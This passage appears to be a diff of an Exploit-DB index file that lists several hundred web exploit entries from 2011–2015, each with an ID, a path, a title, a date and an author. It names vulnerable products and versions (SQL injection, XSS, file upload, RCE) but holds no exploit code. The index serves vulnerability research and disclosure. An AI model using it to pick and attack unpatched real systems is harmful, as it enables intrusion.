Forgery",2015-07-29,hyp3rlinx,webapps,php,80 +37713,exploits/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,webapps,php,80 +37714,exploits/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,webapps,php,80 +37715,exploits/php/webapps/37715.txt,"Tendoo CMS 1.3 - Cross-Site Scripting",2015-07-29,"Arash Khazaei",webapps,php,80 +37720,exploits/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,webapps,hardware, +37725,exploits/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",webapps,php, +37726,exploits/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",webapps,php,80 +37734,exploits/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,webapps,php,80 +37735,exploits/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution",2015-08-07,LiquidWorm,webapps,php,80 +37753,exploits/php/webapps/37753.txt,"WordPress Plugin Simple Image Manipulator 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",webapps,php,80 +37738,exploits/php/webapps/37738.txt,"WordPress Plugin Job Manager 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",webapps,php,80 +37824,exploits/php/webapps/37824.txt,"WordPress Plugin WP Symposium 15.1 - 'get_album_item.php' SQL Injection",2015-08-18,PizzaHatHacker,webapps,php,80 +37744,exploits/php/webapps/37744.txt,"WordPress Plugin Video Gallery 2.7 - SQL Injection",2015-08-09,"Kacper Szurek",webapps,php, +37750,exploits/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",webapps,php,80 +37754,exploits/php/webapps/37754.txt,"WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",webapps,php,80 +37948,exploits/php/webapps/37948.txt,"WordPress Plugin Slideshow - Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,webapps,php, +37950,exploits/php/webapps/37950.txt,"jCore - '/admin/index.php?path' Cross-Site Scripting",2012-10-17,"High-Tech Bridge",webapps,php, +37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple, +37761,exploits/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting",2015-08-12,"Taurus Omar",webapps,ios, +37765,exploits/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",webapps,multiple, +37767,exploits/multiple/webapps/37767.txt,"Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",webapps,multiple, +37769,exploits/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",webapps,php, +37770,exploits/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)",2015-08-15,MadMouse,webapps,hardware, +37773,exploits/php/webapps/37773.txt,"Joomla! Component com_memorix - SQL Injection",2015-08-15,"BM Cloudx",webapps,php, +37774,exploits/php/webapps/37774.txt,"Joomla! Component com_informations - SQL Injection",2015-08-15,"BM Cloudx",webapps,php, +37778,exploits/hardware/webapps/37778.txt,"Security IP Camera Star Vision DVR - Authentication Bypass",2015-08-15,"Meisam Monsef",webapps,hardware, +37779,exploits/php/webapps/37779.txt,"Flogr - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,"High-Tech Bridge",webapps,php, +37781,exploits/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",webapps,php, +37782,exploits/php/webapps/37782.txt,"web@all - Local File Inclusion / Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,webapps,php, +37784,exploits/php/webapps/37784.txt,"Pinterestclones - Security Bypass / HTML Injection",2012-09-08,DaOne,webapps,php, +37785,exploits/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Sepahan TelCom IT Group",webapps,php, +37786,exploits/php/webapps/37786.txt,"DELTAScripts PHP Links - Multiple SQL Injections",2012-09-10,L0n3ly-H34rT,webapps,php, +37787,exploits/php/webapps/37787.txt,"WordPress Plugin Download Monitor - 'dlsearch' Cross-Site Scripting",2012-08-30,"Chris Cooper",webapps,php, +37789,exploits/php/webapps/37789.txt,"OpenFiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",webapps,php, +37790,exploits/php/webapps/37790.txt,"FBDj - 'id' SQL Injection",2012-09-11,"TUNISIAN CYBER",webapps,php, +37791,exploits/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",webapps,multiple, +37940,exploits/php/webapps/37940.txt,"SenseSites CommonSense CMS - 'id' SQL Injection",2012-01-06,"H4ckCity Security Team",webapps,php, +37941,exploits/php/webapps/37941.txt,"SenseSites CommonSense CMS - 'special.php?id' SQL Injection",2012-01-06,"H4ckCity Security Team",webapps,php, +37942,exploits/php/webapps/37942.txt,"SenseSites CommonSense CMS - 'article.php?id' SQL Injection",2012-01-06,"H4ckCity Security Team",webapps,php, +37943,exploits/php/webapps/37943.txt,"WebTitan - 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",webapps,php, +37944,exploits/php/webapps/37944.txt,"vBSEO - 'u' Cross-Site Scripting",2012-06-16,MegaMan,webapps,php, +37945,exploits/php/webapps/37945.txt,"Silverstripe CMS 2.4.x - 'BackURL' Open Redirection",2012-10-15,"Aung Khant",webapps,php, +37946,exploits/php/webapps/37946.txt,"WordPress Plugin Crayon Syntax Highlighter - 'wp_load' Remote File Inclusion",2012-10-15,"Charlie Eriksen",webapps,php, +37801,exploits/hardware/webapps/37801.sh,"Sagemcom F@ST 3864 V2 - Get Admin Password",2015-08-17,"Cade Bull",webapps,hardware, +37802,exploits/jsp/webapps/37802.html,"IFOBS - 'regclientprint.jsp' Multiple HTML Injection Vulnerabilities",2012-09-15,MustLive,webapps,jsp, +37804,exploits/php/webapps/37804.txt,"minimal Gallery - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-17,ayastar,webapps,php, +37805,exploits/php/webapps/37805.txt,"TAGWORX.CMS - 'cid' SQL Injection",2012-09-18,Crim3R,webapps,php, +37806,exploits/cgi/webapps/37806.txt,"AxisInternet VoIP Manager - Multiple Cross-Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",webapps,cgi, +37807,exploits/php/webapps/37807.txt,"vBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,webapps,php, +37809,exploits/php/webapps/37809.php,"Nuts CMS - PHP Remote Code Injection / Execution",2015-08-17,"Yakir Wizman",webapps,php,80 +37811,exploits/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Authenticated Remote Code Execution",2015-08-18,Ebrietas0,webapps,php,80 +37817,exploits/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - Cross-Site Scripting",2015-08-18,hyp3rlinx,webapps,php,80 +37818,exploits/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - Cross-Site Request Forgery",2015-08-18,hyp3rlinx,webapps,php,80 +37819,exploits/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,hyp3rlinx,webapps,php,80 +37820,exploits/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injections",2015-08-18,"Curesec Research Team",webapps,php,80 +37821,exploits/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection",2015-08-18,"Curesec Research Team",webapps,php,80 +37822,exploits/php/webapps/37822.txt,"WordPress Plugin WP Symposium 15.1 - Blind SQL Injection",2015-08-18,dxw,webapps,php,80 +37827,exploits/php/webapps/37827.txt,"WordPress Theme Purity - Multiple Cross-Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",webapps,php, +37828,exploits/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,webapps,php, +37829,exploits/php/webapps/37829.txt,"WordPress Plugin MF Gig Calendar - Cross-Site Scripting",2012-09-20,"Chris Cooper",webapps,php, +37830,exploits/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",webapps,cgi, +37938,exploits/php/webapps/37938.txt,"OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting",2012-10-10,"High-Tech Bridge",webapps,php, +37939,exploits/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",webapps,php, +38066,exploits/php/webapps/38066.txt,"WordPress Plugin Video Lead Form - 'errMsg' Cross-Site Scripting",2012-11-29,"Aditya Balapure",webapps,php, +38067,exploits/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,webapps,hardware,80 +37833,exploits/php/webapps/37833.txt,"YCommerce - Multiple SQL Injections",2012-09-21,"Ricardo Almeida",webapps,php, +37835,exploits/php/webapps/37835.html,"WordPress 3.4.2 - Cross-Site Request Forgery",2012-09-22,AkaStep,webapps,php, +37836,exploits/php/webapps/37836.txt,"WordPress Plugin Token Manager - 'tid' Cross-Site Scripting",2012-09-25,TheCyberNuxbie,webapps,php, +37837,exploits/php/webapps/37837.html,"WordPress Plugin Sexy Add Template - Cross-Site Request Forgery",2012-09-22,the_cyber_nuxbie,webapps,php, +37838,exploits/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart - 'searchFor' Cross-Site Scripting",2011-12-30,farbodmahini,webapps,php, +37885,exploits/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation",2015-08-19,LiquidWorm,webapps,php,9999 +37886,exploits/php/webapps/37886.txt,"up.time 7.5.0 - Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-19,LiquidWorm,webapps,php,9999 +37887,exploits/php/webapps/37887.txt,"up.time 7.5.0 - Arbitrary File Disclose and Delete",2015-08-19,LiquidWorm,webapps,php,9999 +37888,exploits/php/webapps/37888.txt,"up.time 7.5.0 - Upload and Execute",2015-08-19,LiquidWorm,webapps,php,9999 +37891,exploits/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple Vulnerabilities",2015-08-20,"Itzik Chen",webapps,xml,4343 +37892,exploits/asp/webapps/37892.txt,"Vifi Radio 1.0 - Cross-Site Request Forgery",2015-08-20,KnocKout,webapps,asp,80 +37894,exploits/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",webapps,php,80 +37896,exploits/php/webapps/37896.txt,"WordPress Plugin ABC Test - 'id' Cross-Site Scripting",2012-09-26,"Scott Herbert",webapps,php, +37899,exploits/php/webapps/37899.txt,"Switchvox - Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",webapps,php, +37901,exploits/php/webapps/37901.txt,"AlamFifa CMS - 'user_name_cookie' SQL Injection",2012-09-30,L0n3ly-H34rT,webapps,php, +37902,exploits/php/webapps/37902.php,"WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",webapps,php, +37903,exploits/php/webapps/37903.txt,"ZenPhoto - 'admin-news-articles.php' Cross-Site Scripting",2012-10-02,"Scott Herbert",webapps,php, +37904,exploits/php/webapps/37904.txt,"Omnistar Mailer - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",webapps,php, +37906,exploits/php/webapps/37906.txt,"WordPress Plugin Googmonify 0.8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2015-08-21,"Ehsan Hosseini",webapps,php,80 +37907,exploits/php/webapps/37907.txt,"WordPress Plugin MDC Private Message 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",webapps,php,80 +37926,exploits/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",webapps,php, +37927,exploits/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",webapps,php, +37928,exploits/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection / Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php, +37929,exploits/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php, +37930,exploits/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",webapps,php, +37931,exploits/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php, +37932,exploits/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",webapps,php, +37933,exploits/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php, +37934,exploits/php/webapps/37934.txt,"WordPress Plugin Shopp - Multiple Vulnerabilities",2012-10-05,T0x!c,webapps,php, +37935,exploits/php/webapps/37935.txt,"Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection",2012-10-08,"Ibrahim El-Sayed",webapps,php, +37936,exploits/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Local File Inclusion",2012-10-06,L0n3ly-H34rT,webapps,php, +37955,exploits/php/webapps/37955.html,"Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin)",2015-08-24,"Arash Khazaei",webapps,php,80 +37956,exploits/php/webapps/37956.txt,"WordPress Theme GeoPlaces3 - Arbitrary File Upload",2015-08-24,Mdn_Newbie,webapps,php,80 +37959,exploits/php/webapps/37959.txt,"BSW Gallery - 'uploadpic.php' Arbitrary File Upload",2012-10-18,cr4wl3r,webapps,php, +37960,exploits/php/webapps/37960.txt,"Amateur Photographer's Image Gallery - 'force-download.php?File' Information Disclosure",2012-10-18,cr4wl3r,webapps,php, +37961,exploits/php/webapps/37961.txt,"Amateur Photographer's Image Gallery - 'plist.php?albumid' SQL Injection",2012-10-18,cr4wl3r,webapps,php, +37962,exploits/php/webapps/37962.txt,"Amateur Photographer's Image Gallery - 'plist.php?albumid' Cross-Site Scripting",2012-10-18,cr4wl3r,webapps,php, +37963,exploits/php/webapps/37963.txt,"Amateur Photographer's Image Gallery - 'fullscreen.php?albumid' SQL Injection",2012-10-18,cr4wl3r,webapps,php, +37965,exploits/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",webapps,hardware, +37968,exploits/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting",2012-10-19,Netsparker,webapps,php, +37970,exploits/php/webapps/37970.html,"WordPress Plugin Wordfence Security - Cross-Site Scripting",2012-10-18,MustLive,webapps,php, +37971,exploits/php/webapps/37971.html,"WHMCompleteSolution (WHMCS) 4.5.2 - 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",webapps,php, +37973,exploits/php/webapps/37973.txt,"SMF - 'view' Cross-Site Scripting",2012-10-23,Am!r,webapps,php, +37974,exploits/php/webapps/37974.txt,"Inventory - Multiple Cross-Site Scripting / SQL Injections",2012-10-26,G13,webapps,php, +37977,exploits/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",webapps,xml, +37978,exploits/php/webapps/37978.txt,"Gramophone - 'rs' Cross-Site Scripting",2012-10-25,G13,webapps,php, +37979,exploits/php/webapps/37979.txt,"VicBlog - Multiple SQL Injections",2012-10-26,Geek,webapps,php, +37982,exploits/hardware/webapps/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",webapps,hardware, +37983,exploits/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Bypass",2012-10-26,"Michal Blaszczak",webapps,php, +37989,exploits/php/webapps/37989.txt,"IP.Board 4.x - Persistent Cross-Site Scripting",2015-08-27,snop,webapps,php, +37991,exploits/php/webapps/37991.txt,"WANem - Multiple Cross-Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",webapps,php, +37992,exploits/php/webapps/37992.txt,"CorePlayer - 'callback' Cross-Site Scripting",2012-10-28,MustLive,webapps,php, +37993,exploits/php/webapps/37993.txt,"Joomla! Component com_quiz - SQL Injection",2012-10-30,"Daniel Barragan",webapps,php, +37994,exploits/php/webapps/37994.txt,"NetCat CMS - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",webapps,php, +37995,exploits/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) - 'search.aspx' Cross-Site Scripting",2012-10-31,"Anthony Trummer",webapps,asp, +37998,exploits/php/webapps/37998.txt,"WordPress Plugin Responsive Thumbnail Slider 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",webapps,php,80 +37999,exploits/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,webapps,java, +38000,exploits/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload / Execution",2015-08-28,"Narendra Bhati",webapps,php,80 +38002,exploits/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,webapps,php,80 +38004,exploits/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",webapps,hardware,80 +38006,exploits/php/webapps/38006.txt,"BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",webapps,php, +38007,exploits/php/webapps/38007.txt,"DCForum - 'auth_user_file.txt' File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,webapps,php, +38008,exploits/php/webapps/38008.txt,"Joomla! Component Parcoauto - 'idVeicolo' SQL Injection",2012-11-03,"Andrea Bocchetti",webapps,php, +38009,exploits/php/webapps/38009.txt,"AWAuctionScript CMS - Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,webapps,php, +38010,exploits/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",webapps,php, +38011,exploits/php/webapps/38011.txt,"OrangeHRM - 'sortField' SQL Injection",2012-11-07,"High-Tech Bridge",webapps,php, +38012,exploits/php/webapps/38012.txt,"WordPress Plugin FLV Player - 'id' SQL Injection",2012-11-07,"Ashiyane Digital Security Team",webapps,php, +38015,exploits/php/webapps/38015.txt,"AR Web Content Manager (AWCM) - 'cookie_gen.php' Arbitrary Cookie Generation",2012-11-08,"Sooel Son",webapps,php, +38016,exploits/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' SQL Injection",2012-11-09,anonymous,webapps,multiple, +38017,exploits/php/webapps/38017.txt,"WordPress Theme Kakao - 'ID' SQL Injection",2012-11-09,sil3nt,webapps,php, +38018,exploits/php/webapps/38018.txt,"WordPress Plugin PHP Event Calendar - 'cid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",webapps,php, +38019,exploits/php/webapps/38019.txt,"WordPress Plugin Eco-annu - 'eid' SQL Injection",2012-11-09,"Ashiyane Digital Security Team",webapps,php, +38022,exploits/php/webapps/38022.txt,"WordPress Theme Dailyedition-mouss - 'id' SQL Injection",2012-11-16,"Ashiyane Digital Security Team",webapps,php, +38023,exploits/php/webapps/38023.txt,"WordPress Plugin Tagged Albums - 'id' SQL Injection",2012-11-16,"Ashiyane Digital Security Team",webapps,php, +38024,exploits/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",webapps,php, +38025,exploits/php/webapps/38025.txt,"Omni-Secure - 'dir' Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,webapps,php, +38026,exploits/php/webapps/38026.txt,"Friends in War The FAQ Manager - 'question' SQL Injection",2012-11-16,unsuprise,webapps,php, +38027,exploits/php/webapps/38027.txt,"PhpWiki 1.5.4 - Multiple Vulnerabilities",2015-08-31,smash,webapps,php,80 +38029,exploits/hardware/webapps/38029.txt,"Edimax PS-1206MF - Web Admin Authentication Bypass",2015-08-31,smash,webapps,hardware,80 +38030,exploits/php/webapps/38030.php,"Ganglia Web Frontend < 3.5.1 - PHP Code Execution",2015-08-31,"Andrei Costin",webapps,php, +38034,exploits/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",webapps,hardware, +38037,exploits/php/webapps/38037.html,"Open-Realty 2.5.8 - Cross-Site Request Forgery",2012-11-16,"Aung Khant",webapps,php, +38039,exploits/php/webapps/38039.txt,"openSIS 5.1 - 'ajax.php' Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",webapps,php, +38040,exploits/php/webapps/38040.txt,"ATutor 2.1 - 'tool_file' Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",webapps,php, +38041,exploits/php/webapps/38041.txt,"WordPress Theme Madebymilk - 'id' SQL Injection",2012-11-20,"Ashiyane Digital Security Team",webapps,php, +38042,exploits/php/webapps/38042.txt,"dotProject 2.1.x - 'index.php' Multiple SQL Injections",2012-11-21,"High-Tech Bridge",webapps,php, +38043,exploits/php/webapps/38043.txt,"dotProject 2.1.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-11-21,"High-Tech Bridge",webapps,php, +38044,exploits/php/webapps/38044.txt,"Feng Office - Security Bypass / HTML Injection",2012-11-21,Ur0b0r0x,webapps,php, +38045,exploits/php/webapps/38045.html,"XiVO - Cross-Site Request Forgery",2012-11-21,"Francis Provencher",webapps,php, +38046,exploits/php/webapps/38046.txt,"WordPress Plugin Zingiri Web Shop - 'path' Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",webapps,php, +38047,exploits/php/webapps/38047.txt,"WordPress Plugin Webplayer - 'id' SQL Injection",2012-11-22,"Novin hack",webapps,php, +38048,exploits/php/webapps/38048.txt,"WordPress Plugin Plg Novana - 'id' SQL Injection",2012-11-22,sil3nt,webapps,php, +38050,exploits/php/webapps/38050.txt,"WordPress Plugin Zarzadzonie Kontem - 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",webapps,php, +38051,exploits/php/webapps/38051.txt,"Bedita 3.5.1 - Cross-Site Scripting",2015-09-01,"Sébastien Morin",webapps,php,80 +38056,exploits/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,webapps,hardware,80 +38057,exploits/php/webapps/38057.txt,"WordPress Theme Magazine Basic - 'id' SQL Injection",2012-11-22,"Novin hack",webapps,php, +38060,exploits/php/webapps/38060.txt,"WordPress Plugin Ads Box - 'count' SQL Injection",2012-11-26,"Ashiyane Digital Security Team",webapps,php, +38061,exploits/php/webapps/38061.txt,"Beat Websites - 'id' SQL Injection",2012-11-24,Metropolis,webapps,php, +38062,exploits/multiple/webapps/38062.txt,"Forescout CounterACT - 'a' Open Redirection",2012-11-26,"Joseph Sheridan",webapps,multiple, +38063,exploits/php/webapps/38063.txt,"WordPress Theme Wp-ImageZoom - 'id' SQL Injection",2012-11-26,Amirh03in,webapps,php, +38064,exploits/php/webapps/38064.txt,"WordPress Theme CStar Design - 'id' SQL Injection",2012-11-27,Amirh03in,webapps,php, +38068,exploits/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header",2015-09-02,"Pier-Luc Maltais",webapps,php,80 +38071,exploits/php/webapps/38071.rb,"YesWiki 0.2 - 'squelette' Directory Traversal",2015-09-02,HaHwul,webapps,php,80 +38073,exploits/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - Cross-Site Request Forgery / Command Execution",2015-09-02,"Phan Thanh Duy",webapps,hardware,80 +38074,exploits/php/webapps/38074.txt,"Cerb 7.0.3 - Cross-Site Request Forgery",2015-09-02,"High-Tech Bridge SA",webapps,php,80 +38086,exploits/php/webapps/38086.html,"WordPress Plugin Contact Form Generator 2.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",webapps,php,80 +38076,exploits/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,webapps,php, +38077,exploits/php/webapps/38077.txt,"WordPress Theme Toolbox - 'mls' SQL Injection",2012-11-29,"Ashiyane Digital Security Team",webapps,php, +38078,exploits/php/webapps/38078.py,"Elastix - 'page' Cross-Site Scripting",2012-11-29,cheki,webapps,php, +38099,exploits/php/webapps/38099.txt,"TinyMCPUK - 'test' Cross-Site Scripting",2012-12-01,eidelweiss,webapps,php, +38080,exploits/hardware/webapps/38080.txt,"Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities",2015-09-04,Vulnerability-Lab,webapps,hardware, +38081,exploits/hardware/webapps/38081.txt,"HooToo Tripmate HT-TM01 2.000.022 - Cross-Site Request Forgery",2015-09-04,"Ken Smith",webapps,hardware,80 +38090,exploits/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",webapps,php,443 +38091,exploits/php/webapps/38091.php,"Elastix < 2.5 - PHP Code Injection",2015-09-06,i-Hmx,webapps,php, +38101,exploits/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Local File Inclusion",2012-12-30,Amirh03in,webapps,php, +38102,exploits/php/webapps/38102.txt,"WordPress Theme Nest - 'codigo' SQL Injection",2012-12-04,"Ashiyane Digital Security Team",webapps,php, +38103,exploits/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' SQL Injection",2012-12-04,AkaStep,webapps,php, +38097,exploits/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",webapps,hardware,80 +38098,exploits/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,webapps,jsp,8081 +38105,exploits/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,webapps,php,80 +38110,exploits/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",webapps,php, +38111,exploits/php/webapps/38111.txt,"WordPress Plugin Simple Gmail Login - Stack Trace Information Disclosure",2012-12-07,"Aditya Balapure",webapps,php, +38112,exploits/php/webapps/38112.txt,"FOOT Gestion - 'id' SQL Injection",2012-12-07,"Emmanuel Farcy",webapps,php, +38113,exploits/php/webapps/38113.php,"vBulletin ajaxReg Module - SQL Injection",2012-12-08,"Cold Zero",webapps,php, +38114,exploits/cgi/webapps/38114.html,"Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",webapps,cgi, +38115,exploits/php/webapps/38115.txt,"SimpleInvoices invoices Module - Customer Field Cross-Site Scripting",2012-12-10,tommccredie,webapps,php, +38118,exploits/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XML External Entity Injection",2015-09-09,"Alex Haynes",webapps,xml, +38119,exploits/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",webapps,php, +38127,exploits/php/webapps/38127.php,"PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function",2015-09-10,ylbhz,webapps,php, +38128,exploits/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",webapps,cgi,5000 +38129,exploits/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",webapps,php, +38130,exploits/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,webapps,java, +38131,exploits/php/webapps/38131.txt,"PHP Address Book - 'group' Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",webapps,php, +38133,exploits/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext' Cross-Site Scripting",2012-12-17,MustLive,webapps,php, +38134,exploits/php/webapps/38134.txt,"Joomla! Component com_ztautolink - 'Controller' Local File Inclusion",2012-12-19,Xr0b0t,webapps,php, +38135,exploits/php/webapps/38135.txt,"Joomla! Component com_bit - 'Controller' Local File Inclusion",2012-12-19,Xr0b0t,webapps,php, +38139,exploits/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' SQL Injection",2012-12-18,limb0,webapps,php, +38140,exploits/php/webapps/38140.php,"VoipNow Service Provider Edition - Arbitrary Command Execution",2012-12-21,i-Hmx,webapps,php, +38141,exploits/php/webapps/38141.txt,"Hero Framework - 'search?q' Cross-Site Scripting",2012-12-24,"Stefan Schurtz",webapps,php, +38142,exploits/php/webapps/38142.txt,"Hero Framework - users/login 'Username' Cross-Site Scripting",2012-12-24,"Stefan 